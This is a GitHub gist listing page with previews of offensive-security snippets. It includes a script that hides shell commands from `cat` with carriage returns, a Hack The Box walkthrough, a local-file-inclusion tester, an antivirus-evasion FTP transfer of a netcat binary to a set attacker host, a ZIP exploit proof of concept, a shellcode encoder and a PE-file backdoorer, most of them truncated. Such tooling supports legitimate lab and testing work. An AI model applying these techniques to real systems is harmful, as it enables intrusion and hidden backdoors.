Skip to content

Instantly share code, notes, and snippets.

Kevin Kirsche kkirsche

Block or report user

Report or block kkirsche

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@kkirsche
kkirsche / cat-danger.py
Created Jan 8, 2020
The danger of just trusting the cat command
View cat-danger.py
#!/usr/bin/env python3
hidden_cmd = "echo 'You forgot to check `cat -A`!' > oops"
visible_cmd = "echo 'Hello world!'"
if __name__ == "__main__":
with open("demo.sh", "w") as f:
txt = "#!/bin/sh\n"
txt += hidden_cmd + ";" + visible_cmd + " #\r" + visible_cmd + " " * (len(hidden_cmd) + 3) + "\n"
f.write(txt)
@kkirsche
kkirsche / arkham-week1.py
Last active Oct 1, 2019
Arkham Walkthrough
View arkham-week1.py
#!/usr/bin/env python3
from requests import post
from base64 import b64encode, b64decode
from hashlib import sha1
from pyDes import des, ECB, PAD_PKCS5
import hmac
def create_payload():
@kkirsche
kkirsche / README.md
Last active Jul 29, 2019
Patch for rbenv's ree-1.8.7-2012.02 Installer
View README.md
View mount-shared-folders
#!/bin/bash
vmware-hgfsclient | while read folder; do
vmwpath="/mnt/hgfs/${folder}"
echo "[i] Mounting ${folder} (${vmwpath})"
sudo mkdir -p "${vmwpath}"
sudo umount -f "${vmwpath}" 2>/dev/null
sudo vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "${vmwpath}"
done
View lfi-tester.py
import requests
import webbrowser
# formatted using Black
# https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/
url = "http://www.testpage.com?page="
LFI = "../../../../../../../../../"
pages = [
@kkirsche
kkirsche / split-file.py
Created Oct 17, 2018
Antivirus Checking
View split-file.py
#!/usr/bin/env python
from jinja2 import Template
from subprocess import call
lhost = '192.168.102.69'
binary = 'ncx99.exe'
split_num = 50
tmpl = Template('''open {{ lhost }} 21
BINARY
{%- for f in split_files %}
View msf-hex-to-bin.sh
#!/bin/sh
cat "${1}" | tr -d '\\x' | xxd -r -p > "${1}.bin"
View 01-poc.py
#!/usr/bin/env python
# Original Author : corelanc0d3r
# Pocython Author: d3cc3pt10n
# Note: Python 3 doesn't work, Python 2 does...weird!
filename = 'pycorelanboom.zip'
filesize = '\xe4\x0f'
# Local file header
# 30 bytes
@kkirsche
kkirsche / ascii-shellcode-encoder.py
Created Oct 2, 2018 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
View ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving
@kkirsche
kkirsche / backdoor.py
Last active Sep 20, 2018
Backdoor a PE file
View backdoor.py
#!/usr/bin/env python2
import mmap
import os
import pefile
def align(val_to_align, alignment):
return ((val_to_align + alignment - 1) / alignment) * alignment
You can’t perform that action at this time.